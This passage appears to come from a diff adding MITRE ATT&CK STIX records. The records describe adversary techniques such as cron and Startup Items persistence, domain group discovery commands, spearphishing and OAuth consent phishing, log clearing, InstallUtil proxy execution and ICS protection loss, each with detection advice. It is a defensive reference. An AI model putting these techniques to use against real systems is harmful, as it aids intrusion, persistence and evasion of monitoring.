}, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Cron", + "description": "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\n\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", + "created": "2019-12-03T14:25:00.538Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/003", + "external_id": "T1053.003" + }, + { + "source_name": "20 macOS Common Tools and Techniques", + "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", + "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Domain Groups", + "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n\nCommands such as net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Harshal Tupsamudre, Qualys", + "Miriam Wiesner, @miriamxyra, Microsoft Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "created": "2020-02-21T21:15:06.561Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1069/002", + "external_id": "T1069.002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Vulnerabilities", + "description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)\n\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327", + "created": "2020-10-15T02:59:38.628Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1588/006", + "external_id": "T1588.006" + }, + { + "source_name": "National Vulnerability Database", + "description": "National Vulnerability Database. (n.d.). National Vulnerability Database. Retrieved October 15, 2020.", + "url": "https://nvd.nist.gov/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-15T23:51:25.037Z", + "name": "Spearphishing Link", + "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.\n\nAdversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)\n\nAdversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)\n\nAdversaries may also utilize spearphishing links to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured through “consent phishing” into granting adversaries permissions/access via a malicious OAuth 2.0 request URL .(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)\n\nSimilarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Philip Winther", + "Shailesh Tiwary (Indian Army)", + "Mark Wee", + "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", + "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)", + "Kobi Haimovich, CardinalOps", + "Menachem Goldstein" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites as well as links redirecting to adversary infrastructure based by upon suspicious OAuth patterns with unusual TLDs.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021). Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "x_mitre_version": "2.6", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "created": "2020-03-02T19:15:44.182Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1566/002", + "external_id": "T1566.002" + }, + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + }, + { + "source_name": "CISA IDN ST05-016", + "description": "CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.", + "url": "https://us-cert.cisa.gov/ncas/tips/ST05-016" + }, + { + "source_name": "Trend Micro Pawn Storm OAuth 2017", + "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks" + }, + { + "source_name": "Netskope Device Code Phishing 2021", + "description": "Jenko Hwong. (2021, August 10). New Phishing Attacks Exploiting OAuth Authorization Flows (Part 1). Retrieved March 19, 2024.", + "url": "https://www.netskope.com/blog/new-phishing-attacks-exploiting-oauth-authorization-flows-part-1" + }, + { + "source_name": "Microsoft OAuth 2.0 Consent Phishing 2021", + "description": "Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + }, + { + "source_name": "Mandiant URL Obfuscation 2023", + "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.", + "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse" + }, + { + "source_name": "Optiv Device Code Phishing 2021", + "description": "Optiv. (2021, August 17). Microsoft 365 OAuth Device Code Flow and Phishing. Retrieved March 19, 2024.", + "url": "https://www.optiv.com/insights/source-zero/blog/microsoft-365-oauth-device-code-flow-and-phishing" + }, + { + "source_name": "SecureWorks Device Code Phishing 2021", + "description": "SecureWorks Counter Threat Unit Research Team. (2021, June 3). OAuth’S Device Code Flow Abused in Phishing Attacks. Retrieved March 19, 2024.", + "url": "https://www.secureworks.com/blog/oauths-device-code-flow-abused-in-phishing-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Startup Items", + "description": "Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2ba5aa71-9d15-4b22-b726-56af06d9ad2f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1165", + "external_id": "T1165" + }, + { + "source_name": "Startup Items", + "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:01.994Z", + "name": "Loss of Protection", + "description": "Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel. \n\nMany faults and abnormal conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable protective system functions as a prerequisite to subsequent attack execution or to allow for future faults and abnormal conditions to go unchecked. Detection of a Loss of Protection by operators can result in the shutdown of a process due to strict policies regarding protection systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "created": "2021-04-12T07:57:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0837", + "external_id": "T0837" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Clear Linux or Mac System Logs", + "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* /var/log/messages:: General and system-related messages\n* /var/log/secure or /var/log/auth.log: Authentication logs\n* /var/log/utmp or /var/log/wtmp: Login records\n* /var/log/kern.log: Kernel logs\n* /var/log/cron.log: Crond logs\n* /var/log/maillog: Mail server logs\n* /var/log/httpd/: Web server access and error logs\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "created": "2020-01-28T17:11:54.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070/002", + "external_id": "T1070.002" + }, + { + "source_name": "Linux Logs", + "description": "Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.", + "url": "https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Application or System Exploitation", + "description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.\n\nAdversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "created": "2020-02-20T15:37:27.052Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1499/004", + "external_id": "T1499.004" + }, + { + "source_name": "Sucuri BIND9 August 2015", + "description": "Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit in the Wild. Retrieved April 26, 2019.", + "url": "https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Office Application Startup", + "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Nick Carr, Mandiant", + "Microsoft Threat Intelligence Center (MSTIC)", + "Sahar Shukrun", + "Praetorian", + "Loic Jaquemet", + "Ricardo Dias" + ], + "x_mitre_detection": "Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.\n\nMany Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)\n\nMicrosoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1137", + "external_id": "T1137" + }, + { + "source_name": "SensePost Ruler GitHub", + "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.", + "url": "https://github.com/sensepost/ruler" + }, + { + "source_name": "TechNet O365 Outlook Rules", + "description": "Koeller, B.. (2018, February 21). Defending Against Rules and Forms Injection. Retrieved November 5, 2019.", + "url": "https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/" + }, + { + "source_name": "CrowdStrike Outlook Forms", + "description": "Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.", + "url": "https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746" + }, + { + "source_name": "Outlook Today Home Page", + "description": "Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.", + "url": "https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943" + }, + { + "source_name": "Microsoft Detect Outlook Forms", + "description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.", + "url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack" + }, + { + "source_name": "SensePost NotRuler", + "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", + "url": "https://github.com/sensepost/notruler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "InstallUtil", + "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Casey Smith" + ], + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application control" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "created": "2020-01-23T19:09:48.811Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/004", + "external_id": "T1218.004" + }, + { + "source_name": "MSDN InstallUtil", + "description": "Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/50614e95.aspx" + }, + { + "source_name": "LOLBAS Installutil", + "description": "LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Installutil/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:02.197Z", + "name": "Monitor Process State", + "description": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": 